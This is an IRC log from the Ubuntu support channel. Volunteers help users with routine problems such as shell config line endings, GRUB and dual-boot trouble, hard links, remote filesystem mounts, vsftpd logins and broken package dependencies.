ubottufloown: Nous sommes desoles mais ce canal est en anglais uniquement. Si vous avez besoin d'aide ou voulez discuter en français, veuillez taper /join #ubuntu-fr ou /join #ubuntu-qc. Merci.13:48
repulseHello, how does one ask a package maintainer to bump the version of a certain package due to a bug in it that has already been fixed upstream? Just file a launchpad bug report and wait?14:02
jeremy31repulse: Filing a bug report should get the maintainers attention14:14
yehoshuaHi guys, is this the right channel for Ubuntu Advantage support/questions?14:20
yehoshuawe have a few hundred xenial desktops and want to make sure we can enable ESM, is there a way to check this before Xenial enters the ESM period? (also, it is unclear on which date the regular security updates will not be available and when ESM becomes the active updating service)14:22
crimson_kingWill I lose any functionality if I create a new user on Ubuntu Server 20.04 for RPi4 (arm64)? I read somewhere that the default installation still expects you to be using the default user "ubuntu", or something like that... now I'm concerned.14:30
fradhow do I edit a picture's metadata? gimp?14:45
fradthunar right click?14:45
fradi want to change the exif metadata14:48
olleMy .bashrc couldn't be moved from Ubuntu 16 to 20 LTS.14:51
olleAny ideas? I get syntax errors14:52
olleand screen is weird, starting with $TERM vt100 instead of xterm-25614:53
blwhat are the errors?14:53
ollebl: first is just14:54
olle": command not found14:54
ollenext is14:54
ollebash: Downloads/bashrc: line 6: syntax error near unexpected token `$'in\r''14:54
ollein a case-block14:54
ollesource is14:54
olle`case $- in`14:55
ollesimple enough14:55
olleThe rc file does not begin with a bang, but I read it's not supposed to.14:55
fpombalanyone have any idea about the 2 questions I posted above? I can also try asking on #debian I suppose...14:57
=== Patrick_ is now known as ptah
olleMaybe I better start over with an empty bashrc14:57
olleBut I'm confused by the screen problem - my screenrc doesn't work at all, tab names are not showing properly, colours, etc14:58
olleShit, maybe it's line endings...14:58
olleI emailed the text file to myself14:59
blolle: i'm far from an expert and i recently started here14:59
blolle: yea, maybe line endings haha :)14:59
blolle: i was about to ask if you can break the file up into pieces which it sounds like you might have already thought of15:00
olleWorks now15:00
blso it was line endings?15:01
olleApplying dos2unix fixed it15:01
olleYes, and echo $TERM now shows the correct screen-256color inside screen15:02
blyou said you were having problems a screenrc?  that must be new to ubuntu 2015:02
olleAlso stupid mail system that apparently Windowsified all files ><15:02
bljust curious did you upgrade to 18 first?15:03
ollebl: no upgrade, this is a fresh install15:04
olleI never do dist-upgrade...15:04
olleBut I should take the habit of putting /home in a seperate partition.15:04
olleI have Manjaro and Ubuntu on one disk now (gaming and work) - wanna put FreeBSD or DragonflyBSD as well. If grub can manage.15:05
fradcan the exif metadata of a picture be edited?15:06
blgotcha, when you said you went from 16 to 20 i was curious how you did the upgrade.  that's a lot of installations...this might be a better conversation for ubuntu-offtopic15:06
fradI downloaded xnviewmp because they claim it does the thing15:06
leftyfb!repeat | frad15:06
ubottufrad: Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or https://ubuntuforums.org or https://askubuntu.com/15:06
leftyfb!yy.mm | bl15:07
ubottubl: Ubuntu version numbers are: YY.MM (YY=release year,MM=release month). Each year sees two releases, so just specifying YY is imprecise. See also https://www.ubuntu.com/about/release-cycle15:07
fradit was a different question15:07
JoeLlamaI have mIRC set to "Automatically accept invalid certificates" but I keep getting "* Unable to connect to server (SSL private key error)" when logging onto a server using port 6697 while running on wine under xubuntu 20.0415:20
JoeLlamadidn't seem to do that under windows15:20
JoeLlamaWindows IS the virus15:21
ollemaybe not use mIRC?15:22
JoeLlamanotta option15:22
JoeLlamanext? :)15:22
ollecheck the wine page for mIRC?15:22
JoeLlamacan't find anything on google15:23
ollesee advice 1 xD15:23
JoeLlamaonly that something was fixed in 7.6415:23
JoeLlamaI will look again olle15:23
olleJoeLlama: look for wine and ssl problems (leave out mirc)15:24
JoeLlamanothing on google with that phrase15:25
JoeLlamagood job olle :) :)15:25
JoeLlamayes there are stuffs listed if I leave out mIRC15:26
JoeLlamayay! :)15:27
JoeLlamaso it's apparently not an mIRC issue15:27
JoeLlamait did seem to run on windows okay15:27
JoeLlamaokay next...  how do I remove the double tap feature on the touch pad?15:28
JoeLlamait's making me (more) nuts15:28
JoeLlamaagian xubuntu 20.0415:28
JoeLlamaoops again15:28
JoeLlamatouch pad: remove double touch feature running under xubuntu 20.04?15:30
olleuse a mouse instead?15:31
JoeLlamanotta option15:32
JoeLlamaeh, happy enough with the info on wine and SSL15:32
JoeLlamaokay one more...  I need to remove the password15:33
JoeLlamawhat's the trick?15:34
JoeLlamawhen I close the lid and open it, it asks for my password15:34
JoeLlamaI want that to stop15:34
ollewhat lid?15:34
JoeLlamaI googled and can't seem to find what works and it should be easy15:34
JoeLlamaoh notebook15:35
JoeLlamaclose the lid and open it and gotta enter a password15:35
ollecheck settings for screensaver15:35
JoeLlamaoh ok makes sense15:35
JoeLlamaturn off "lock screen?"15:37
JoeLlamaolle (:15:37
JoeLlamaI turned it off testing now15:37
JoeLlamawell sometimes it doesn't ask for a password and this time it didn't so time will tell if that fixed it15:38
JoeLlamathanks again olle15:38
JoeLlamado ya know where the touchpad settings thingy is?15:38
JoeLlamathingy is a technical term15:39
ollethere should be "Mouse and touchpad" settings or similar15:39
olleDunno which ubuntu you use, tho15:39
JoeLlamayup just didn't ded  to find what I nee15:41
JoeLlamacrap happened agai15:42
JoeLlamajust didn't seem to find what I needed but perhaps disable touchpad while typing might help15:42
JoeLlamaoh it's not there ;/15:42
JoeLlamaok how do you turn the touchpad back on without a touchpad or mouse? :(15:45
JoeLlamaI am dumb sometimes I turned it off15:45
JoeLlamaoh okay found terminal stuffs to type in for touchpad15:47
JoeLlamathanks olle :)15:47
fradis this the channel to ask about --exif? https://manpages.ubuntu.com/manpages/trusty/man1/exif.1.html15:52
JoeLlamaokay time to go bye15:54
quantumDoes ubuntu come without nftables?16:03
leftyfbquantum: it's not installed by default if that is what you are asking16:04
quantumleftyfb: apt search nftables doesn't find it.16:04
leftyfbquantum: it's part of the universe repo16:04
quantumHow do I add that?16:04
leftyfb!universe | quantum16:05
ubottuquantum: The packages in Ubuntu are divided into several sections. More information at https://help.ubuntu.com/community/Repositories - See https://wiki.ubuntu.com/RecommendedSources for the recommended way to set up your repositories.16:05
isapgswellxscreen do not deal if the diference between same monitor and dual gpu16:26
isapgswellxscreen do not deal with the diference between same monitor and dual gpu16:28
oerheksisapgswell, why would screen do that?16:28
isapgswelloerheks optimus16:29
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oerhekswhat is your goal? running a 3d window over a 2d service?16:35
=== senPie is now known as Aguschan
isapgswelloerheks play 3d game external display handled by nvidia16:36
oerheksthat has nothing to do with xscreen, i guess16:37
isapgswelloerkheks the problem is that my intel has capability to display on the same monitor16:37
EikenberryHello. I'm new-ish to Linux, and am trying to install Ubuntu 20.04 LTS to a brand new HDD, in order to set up a dual-boot with Windows 10, but am running into a weird series of problems. The installation runs without issue, and the boot loader is configured, as far as I can tell, but when attempting to boot into Ubuntu first, I'm dumped to the GRUB17:04
Eikenberrycommand line.  When running the "ls" command, GRUB can find all of my drives... except the drive Ubuntu is installed on. If I boot into live mode from my usb stick, the "lsblk" shows the drive, and even Windows recognizes the drive. When I attempt to run boot-repair, I get an error message stating that nothing could be done because Windows was17:04
Eikenberrydetected in a hibernation state - this is extra weird, because as far as I can tell, there is no hibernation file on the Windows drive (hiberfile.sys isn't found anywhere), and I make sure to do a full reboot from windows, and have even tried a full system shutdown, but no dice. So, I'm stuck, and not sure what to do next. Any tips? Thanks. Latest17:04
EikenberryUbuntu boot repair pastebin: https://paste.ubuntu.com/p/3TcXNC4hmN/17:04
Eikenberryas additional info, i have also verified that windows' "Fast Startup" power option has been (and remains) disabled.17:20
van777Eikenberry: i'd reinstall ubuntu and see what happens17:20
EikenberryI did prior to joining the channel, but alas, same issues.17:21
van777does your windows boot?17:22
EikenberryI'm running it now in fact. :)17:22
van777Eikenberry: did you try https://sourceforge.net/projects/boot-repair-cd/files/ ?17:31
EikenberryI ran the boot repair utility using the 2nd option from this page: https://help.ubuntu.com/community/Boot-Repair, which is what generated the pastebin report above. My understanding is that they are functionally identical?17:33
tomreynEikenberry: i would think so, it's maybe a different version, but i don't think it will matter.17:40
tomreynEikenberry: it's a pity that you're running into this bad user experience. it's possible that uncommon or known to be explicitly linux-unfriendly hardware will give you such results. also multi-disk installations can cause this when UEFI booting.17:42
tomreynthis *could* be bug 1396379, but that's a really rough guess.17:43
ubottubug 1396379 in ubiquity (Ubuntu) "installer uses first EFI system partition found even when directed otherwise" [High,Confirmed] https://launchpad.net/bugs/139637917:43
tomreynwhich computer hardware do you have there?17:43
EikenberryYeah. I have a suspicion it may ultimately be hardware related if there's not an obvious software issue; My desktop is rather full of SATA drives, so in order to get this drive working, I had to buy a SATA expansion card and the new drive is plugged into that. Still, didn't expect it to be an issue if both Windows and Ubuntu Live can see the drive.17:43
EikenberryAnother possibility: Did I maybe use the wrong utility for creating a bootable usb drive?17:44
Eikenberryi used balenaetcher instead of rufus.17:45
tomreynmaybe, but then the installation would liely (but not certainly) have run into errors.17:45
tomreynetcher should be fine, since it verified the data written17:45
tomreyni assume it did not warn about a mismatch of written and re-read data?17:45
EikenberryNot to my knowledge.17:46
tomreynalso, you should verify that you actually downloaded the latest installer iso, and that it downloaded completely, and unmodified17:46
ubottuTo verify your Ubuntu ISO image (or other files for which a checksum is provided), see https://ubuntu.com/tutorials/how-to-verify-ubuntu17:46
tomreynif this is a 64-bit amd-like (also intel) system (64-bit boot code, 64-bit cpu), then the name of the ISO file you should have downloaded is ubuntu-
tomreynhttps://ubuntu.com/tutorials/how-to-verify-ubuntu is another guide onverifying the download17:49
Eikenberrychecking now.17:50
tomreynbut what you described above really sounds like the problem is with grub not seeing the 'new disk', and it seems less likely that this could be related to a broken installer17:50
Eikenberryyeah, there are not any warnings or errors that pop up from the live install. confirmed the ISO file is the correct name. working on verifying gpg etc just for completeness sake.17:51
quantumWhy can't Ubuntu remember the system time on reboot?  The HW clock remembers it.17:53
tomreynEikenberry: very well. another approach you can take, just as a cross testing strategy, is to install ubuntu server instead (better use a wired connection then, though), then install the ubuntu-desktop package (after installation).17:53
tomreynquantum: that's not a general Ubuntu issue, it will be somehow specific to your system. it actually gets the time from your HW clock initially, if running bare metal.17:54
quantumIt's not.  And it's not running /etc/bash.bashrc either.17:55
tomreynsee the "clocksource" lines (and related) in    journalctl -b17:55
Eikenberryconfirmed the ISO is valid.17:55
quantumtomreyn: Apr 01 10:23:43 enclave2.dakmtter.org kernel: clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x588fe9dc0, max_idle_ns: 440795202592 ns17:57
quantumApr 01 10:23:43 enclave2.dakmtter.org kernel: clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns17:57
quantumApr 01 10:23:43 enclave2.dakmtter.org kernel: clocksource: Switched to clocksource arch_sys_counter17:57
tomreyn!paste | quantum17:57
ubottuquantum: For posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.17:57
quantumI don't see the problem with clocksource.17:57
tomreynquantum: i assume this is SoC hardware?17:58
EikenberrySo I think next step, for me at least, is to swap the SATA connectors on the HDD to see if that makes a difference. It's a weird hardware card, definitely non standard. When in doubt, eliminate the weird. Thanks for your help Tom17:58
quantumHW clock is just fine.17:58
tomreynit's generally good to point it out when you're not using the most common type of hardware, amd/intel x86 / x86_64 systems17:59
quantumOdroid N2+.  Special release of Ubuntu for this board.18:00
EikenberryI'm on a bog standard intel x64 system, it's just that I stuck a SATA expansion card into my pci express slot. I suspect it's doing something to annoy Ubuntu18:00
EikenberryBut at least I didn't do anything obviously dumb on the software side. Progress. :)18:00
tomreynquantum: special release, as downloaded from?18:00
EikenberryGotta log off to do the changes, thanks again18:00
quantumHardKernel, which makes the Odroid.18:00
tomreynwe only support the isos and images downloaded from *.ubuntu.com and official mirrors, i'm afraid.18:01
quantumYou say the system clock gets its time from the HW clock.  What's the mechanism?18:02
quantumAnd what's supposed to invoke bash.bashrc?18:02
tomreynsee above18:02
quantumOk.  You don't know.18:03
tomreynthe problem with third party instalelrs and images is we just can't know how they were modified, and most of the time they were.18:03
quantumI'm asking standard.  How the 'official' release' does it.18:04
oerhekstry the official iso? to see if you hw clock changes18:04
quantumBut, that's a mystery, so I'll have to hot-wire it.18:04
JoeLlamaI need xubuntu 20.04 to open uip and put a mouse pad file, several folders, the mail program, etc., on screen in their prospective positions.  How is that done?  Needs to be automagic18:15
oerheksdevilspie comes in mind18:18
oerheks!info devilspie18:18
ubottudevilspie (source: devilspie): find windows and perform actions on them. In component universe, is optional. Version 0.23-2build1 (focal), package size 44 kB, installed size 228 kB18:18
oerheksor some setting in xfce, Settings Manager > Window Manager Tweaks > Placement18:18
tomreynwhat's "uip"?18:20
oerheksi think typo, to open up18:20
tomreyni see, so boot to desktop, automatic login, i assume18:21
tomreynxdotool, autokey, sikuli might be relevant, too18:23
tomreyni'm not sure whether any of those would work on (x)wayland18:24
JoeLlamaokay thanks oerheks and ubottu18:28
JoeLlamaand tomreyn18:28
noor2can anyone tell me how can i create a hard link to a file thats outside my home directory18:29
JoeLlamaisn't there a way that ubuntu just knows where to place a window?  also, I don't want long path names when I alt-tab I just want the window name...  how is that done?18:29
oerheksjust told you, Settings Manager > Window Manager Tweaks > Placement. ....18:30
JoeLlamaoh ok thanks oerheks18:30
JoeLlamaand how do I get rid of the long path-name when alt-tabbing?18:31
oerheksand for a direct access to a window, your mouse or reask in #xubuntu?18:31
JoeLlamaI get the feeling I'm stuck with that long path-name when alt-tabbing18:34
latincanadianhello, i can ask a question here concerning ubuntu linux wifi network card driver?18:39
leftyfbJoeLlama: long path name?18:46
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stanfosdanyone able to help me get a remote NTFS volume mounted?19:13
lotuspsychjeask your question to the channel stanfosd so volunteers can help think along with your issue19:15
willercan't believe i have to deal with this same stuff STILL in 202119:15
willerinstall xubuntu and watch youtube - screen WILL go blank19:15
stanfosdI have a Debian 10 box that has an NTFS volume mounted.  I would like to mount this on my Ubuntu 20.04 box, but cant figure out how to do this.19:16
willerdisable all display related stuff from power settings- screen will blank19:16
willerscreen will blank even if no vid is playing and all power savings disabled. jeeeeesus it's been the same for YEARS19:17
oerheksstanfosd, copy the fstab line from your debian in ubuntu?19:17
ubottuThe /etc/fstab file indicates how drive partitions are to be used or otherwise integrated into the file system. See https://help.ubuntu.com/community/Fstab and http://www.pclosmag.com/html/Issues/200709/page07.html and !Partitions19:17
unixbsd_1how to remove the video GHOST effect into PCSXR2 while playing Grand theft auto San Andreas ? (ubuntu groovy amd64)19:17
unixbsd_1* PCSX219:18
oerheksunixbsd_1, not an ubuntu issue, ask in the whine channel perhaps?19:18
oerheksor (#pcsx2 on efnet)19:19
lotuspsychjewiller: we cant generalize video issue statements like that19:19
willerlotuspsychje:but it's been like this for years. it IS general19:19
stanfosdoerheks UUID is used on debian box for fstab.  Can I use that remotely?19:20
lotuspsychjewiller: your pc specs? graphics card driver installed? xubuntu release?19:20
unixbsd_1I dont use wine hq, but pcsx219:20
willerthinkpad l480, as basic as it gets19:20
oerheksstanfosd, yes, it should be the same. you can check with 'blkid'19:20
lotuspsychjewiller: does vlc videos play?19:20
willerlotuspsychje: i don't want to find that out, i want to install xubuntu and watch a cooking vid on youtube without going to sleep19:21
willer20.10, sorry for being frustrated19:21
lotuspsychjewiller: if you want help from the volunteers, you will need to share some info, logs,..19:22
willersure, my apologies.19:22
shinobiI just updated the linux-firmware package. Does this require a reboot?19:23
oerheksshinobi, no.  if the file /var/run/reboot-required exists, you should19:24
oerheksbut here i have no warning as such19:24
shinobioerheks: Do you know how to see the release notes to the linux-firmware package? I'm expecting new firmware for my wifi adapter.19:25
willerlotuspsychje:however i'm not doing any work on this issue just venting on irc19:25
willerit shouldn't be like this ;_;19:25
lotuspsychje!discuss | willer19:25
ubottuwiller: Want to talk about Ubuntu, but don't have a support question? /join #ubuntu-discuss for non-support Ubuntu discussion, or try #ubuntu-offtopic for general chat. Thanks!19:25
stanfosdSorry, maybe i'm not getting it.  How do I structure fstab to mount a remote volume using UUID?19:35
pavlosnoor2: use ln instead of ln -s ... also see man ln19:36
leftyfbstanfosd: you don't. You mount remote filesystems with something like NFS or CIFS19:40
noor2anyone here is familier with ubuntu terminal19:41
leftyfbnoor2: ask your support question19:42
stanfosdok.  So if I have an NTFS volume mounted on a Debian 10 box, how would I access this from an ubuntu 20.04 box.19:42
noor2i wanna create a hardlink to a file thats outside my home directory how do i do it19:42
leftyfbstanfosd: as I told you, you setup a remote filesystem share like NFS or CIFS19:42
noor2is it possible19:42
leftyfbnoor2: what have you tried?19:42
noor2i can create hardlinks if its within the same directory but not if its outside19:43
noor2not sure how to do it19:43
leftyfbnoor2: what have you tried exactly? Use pastebin to paste commands and error messages19:44
leftyfbnoor2: also, is this outside directory on the same filesystem?(ext4)19:45
noor2ln targetfile sourcefile19:45
leftyfbnoor2: that is not what was asked19:46
oerheksshinobi, look at launchpad 'linux-firmware source '  for the changelog?19:47
noor2thats what i used19:47
userxhow do i get a command to always be run as a normal user instead of root? i've appended the line "root ALL = (std_user) /path/to/command" to /etc/sudoers but it still seems to run as root. what am i missing?19:48
leftyfbnoor2: that command will attempt to create a hard link with targetfile as link to sourcefile in the same directory. I see no error messages at all so it looks like what you are attempting to do works just fine.19:48
noor2yes as long as im in the same directory19:49
leftyfbuserx: the sudoers file is used to give permissions for regular users to run commands using sudo. They will all be run as root unless you specify a different user as part of your sudo command19:50
noor2so if im in hime direcotry and i have file in document directory it wont work19:50
leftyfbnoor2: please link to the paste.ubuntu.com link with the exact command and error messages you are getting19:51
leftyfbnoor2: do not type it here. Copy and paste the command and error message from your terminal to http://paste.ubuntu.com19:51
pavlosnoor2: ln hardlinkdoc Documents/somedoc.ods       ... you can edit hardlinkdoc as if it were somedoc.ods19:53
leftyfbnoor2: you did not paste the command19:55
leftyfbnoor2: also, you do know it's:  ln <file-that-exists> <to-link-file-that-does-not-yet-exist> right?19:57
leftyfbnoor2: the error message tells you that note.txt does not exist. Does it?19:57
noor2it does19:57
leftyfbnoor2: please pastebin the output of this:  file note.txt19:58
makara1hi. Sound is not coming through my bluetooth devices since an update today. I'm on Ubuntu 20.04.2 LTS19:58
noor2im in my home directory but the file is in documents. outside the home directory19:58
leftyfboerheks: we have no idea what directory they are in19:58
leftyfbnoor2: ok, then tell ln that19:59
makara1the devices connect - everything looks fine, but no sound19:59
ptahcp -s file file219:59
leftyfbptah: you are not helping19:59
noor2thats soft link19:59
leftyfbnoor2: ln -s </full/path/to/exist-file> </full/new-path/to/new-linked-file>20:00
ptahnoor2, ur not putt9ing the entire path20:00
leftyfbnoor2: ln -s ~/note.txt ~/Documents/hardlink120:00
ptahof the document link20:00
oerheksif that doc is outside your home, make sure it is readable as the user20:02
leftyfbalso a filesystem that allows links (not NTFS)20:02
noor2ok cheers everyone20:04
unixbsd_1Cool, I finally managed to play GrandTheftAuto San Andreas, and I activated cheat: Lock Star to Min, to unlock all map. GTA San Andreas is working very well on Groovy ;)20:22
unixbsd_1(using PCSX2)20:23
leftyfb!ot | unixbsd_120:24
ubottuunixbsd_1: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please register with NickServ (see /msg ubottu !register) and use #ubuntu-offtopic for other topics (though our !guidelines apply there too). Thanks!20:24
fandre1986Hello Colleagues, I installed vsftpd on my Ubuntu 16.0420:29
fandre1986The user 'ftp' was created automatically. Can I use this user to copy files from a remote system?20:29
fandre1986Or I must create a new user and pass?20:30
leftyfbfandre1986: You should follow the vsftp documentation and create a user. Is this just a temporary solution to get files copied over? Why not just use ssh/sftpd ? Also, you do know Ubuntu 16.04 will be EOL next month right?20:31
oerheksapril 3020:32
fandre1986leftyfb I am aware but I have the need to use this release and only FTP.20:51
leftyfbfandre1986: sounds insecure. good luck20:51
fandre1986I created a new user and password but I get login fail when attempt to connect to the server. Any ideas?20:52
fandre1986leftyfb is just an isolated system.20:53
leftyfbfandre1986: look through your logs20:53
fandre1986seems not much information in vsftpd.log20:56
leftyfbfandre1986: https://askubuntu.com/a/41369420:58
leftyfbfandre1986: first result on google for 'vsftpd "Login incorrect"'20:59
fandre1986Thanks leftyfb21:04
* Ubuntivity wonders if humans still exist on IRC21:30
guivercPlease stick to support here Ubuntivity ; #ubuntu-offtopic would no doubt get responses to that21:31
Ubuntivityguiverc: sorry. I thought my IRC client had some glitch preventing my messages from being sent.21:32
pavlosfandre1986: is the newuser listed in /etc/ftpusers on the server?21:57
Gapihello how to install build-essential on 20.4.2   dependecie issue  with g++ and libc6-dev21:59
Gapii do not want upgrade to 20.10 and finde out there is same issue22:00
Gapisorry 20.04.222:01
jeremy31Gapi: try> sudo apt install dkms22:05
GapiRecommended packages:22:09
Gapi  build-essential libc6-dev | libc-dev libc6-dev22:09
Gapiok will try22:09
jeremy31Gapi: paste any errors at paste.ubuntu.com and post the URL here22:09
Gapibut this is only recomanded to install   it will not install them22:10
jeremy31Gapi: recommends should be installed22:12
GapiThe following packages have unmet dependencies:22:12
Gapi build-essential : Depends: libc6-dev but it is not going to be installed or22:12
Gapi                            libc-dev22:12
Gapi                   Depends: g++ (>= 4:9.2) but it is not going to be installed22:12
jeremy31Gapi: sudo apt install g++22:13
GapiThe following packages have unmet dependencies:22:14
Gapi g++ : Depends: g++-9 (>= 9.3.0-3~) but it is not going to be installed22:14
GapiE: Unable to correct problems, you have held broken packages.22:14
Gapiapt -f install do nothing22:14
Gapioh this is fresh install of ubuntu + some minor stuff  like this irc client and teamspeak and minecraft+ java22:16
jeremy31Gapi: try>  sudo dpkg --configure -a22:17
Bashing-om!info g++-9 focal22:19
ubottug++-9 (source: gcc-9): GNU C++ compiler. In component main, is optional. Version 9.3.0-17ubuntu1~20.04 (focal), package size 8208 kB, installed size 27989 kB22:19
Gapino errors22:20
jeremy31Gapi: did you add any PPA's?22:20
Gapijust webmin in sources.list22:21
jeremy31Gapi: try commenting that out, then do a>  sudo apt update && sudo apt install build-essential22:22
Gapiwill try22:22
Gapiok  next try is  change repository   from local to  us maybe   i know it will go slower22:25
RikMillsyou can also use apt to iterate through the dependencies until you find what the issue is22:26
jeremy31Gapi: or do another new install and install build-essential before making changes22:26
Gapinooooooooooo :(22:27
RikMillse.g. sudo apt install g++ g++-922:27
RikMillsand see what error that gives22:27
GapiThe following packages have unmet dependencies:22:28
Gapi g++-9 : Depends: libstdc++-9-dev (= 9.3.0-17ubuntu1~20.04) but it is not going to be installed22:28
GapiE: Unable to correct problems, you have held broken packages.22:28
RikMillssudo apt install g++ g++-9 libstdc++-9-dev22:29
RikMillsif you keep doing that, apt will eventually tell you thye root of the issue22:29
GapiThe following packages have unmet dependencies:22:30
Gapi libstdc++-9-dev : Depends: libc6-dev (>= 2.13-0ubuntu6) but it is not going to be installed22:30
GapiE: Unable to correct problems, you have held broken packages.22:30
RikMillsso sudo apt install g++ g++-9 libstdc++-9-dev libc6-dev22:30
RikMillssee what I mean about iterating22:31
ForeverNoob[m]hi, I'm trying to verify the cloud images here: https://cloud-images.ubuntu.com/focal/current/ - but when I do `gpg --verify SHA256SUMS.gpg SHA256SUMS` it tells me that I don't have a public key. Where can I find the Ubuntu public keys that were used to sign these images?22:31
Gapisame error22:31
Gapiok i give up22:32
Gapinow will try in new fresh virtual machine22:32
Gapifck me sideways   on fresh install in virtual machine is working22:47
Gapifrom same source  .iso22:50
RikMillsthat is not surprising.23:01
ForeverNoob[m]So I downloaded the `focal-server-cloudimg-amd64-disk-kvm.img`, do I still need to do `qemu-img convert ...` in order to `virt-install` it?23:18
ForeverNoob[m]Self answer: No.23:47

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